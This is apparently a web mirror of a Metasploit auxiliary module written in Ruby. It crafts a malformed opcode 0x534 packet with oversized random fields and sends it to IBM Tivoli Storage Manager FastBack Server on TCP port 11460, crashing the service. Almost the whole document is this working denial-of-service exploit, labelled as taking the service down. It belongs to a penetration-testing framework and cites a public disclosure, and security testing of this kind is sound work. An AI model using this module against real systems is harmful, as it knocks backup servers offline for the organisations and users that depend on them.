Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/dos/misc/ibm_tsm_dos.rb
19592 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::Tcp

8
  include Msf::Auxiliary::Dos

9


10
  def initialize(info = {})

11
    super(

12
      update_info(

13
        info,

14
        'Name' => 'IBM Tivoli Storage Manager FastBack Server Opcode 0x534 Denial of Service',

15
        'Description' => %q{

16
          This module exploits a denial of service condition present in IBM Tivoli Storage Manager

17
          FastBack Server when dealing with packets triggering the opcode 0x534 handler.

18
        },

19
        'License' => MSF_LICENSE,

20
        'Author' => [

21
          'Gianni Gnesa', # Public disclosure/Proof of Concept

22
          'William Webb <william_webb[at]rapid7.com>', # Metasploit

23
        ],

24
        'References' => [

25
          ['EDB', '38979'],

26
          ['OSVDB', '132307']

27
        ],

28
        'DisclosureDate' => '2015-12-15',

29
        'Notes' => {

30
          'Stability' => [CRASH_SERVICE_DOWN],

31
          'SideEffects' => [],

32
          'Reliability' => []

33
        }

34
      )

35
    )

36


37
    register_options(

38
      [

39
        Opt::RPORT(11460)

40
      ]

41
    )

42
  end

43


44
  def tv_pkt(opcode, p1 = '', p2 = '', p3 = '')

45
    buf = Rex::Text.rand_text_alpha(0x0C)

46
    buf += [opcode].pack('V')

47
    buf += [0x00].pack('V')

48
    buf += [p1.length].pack('V')

49
    buf += [p1.length].pack('V')

50
    buf += [p2.length].pack('V')

51
    buf += [p1.length + p2.length].pack('V')

52
    buf += [p3.length].pack('V')

53


54
    buf += Rex::Text.rand_text_alpha(0x08)

55


56
    buf += p1

57
    buf += p2

58
    buf += p3

59


60
    pkt = [buf.length].pack('N')

61
    pkt << buf

62


63
    return pkt

64
  end

65


66
  def run

67
    target_opcode = 0x534

68
    connect

69
    print_status("Connected to: #{rhost} port: #{rport}")

70
    print_status('Sending malicious packet')

71


72
    p = tv_pkt(

73
      target_opcode,

74
      "File: #{Rex::Text.rand_text_alpha(0x200)} From: 0 To: 0 ChunkLoc: 0 FileLoc: 0",

75
      Rex::Text.rand_text_alpha(0x60),

76
      Rex::Text.rand_text_alpha(0x60)

77
    )

78


79
    sock.put(p)

80
    print_status('Packet sent!')

81
  rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e

82
    print_error("Exploit failed: #{e.class} #{e.message}")

83
    elog(e)

84
  ensure

85
    disconnect

86
  end

87
end

88


89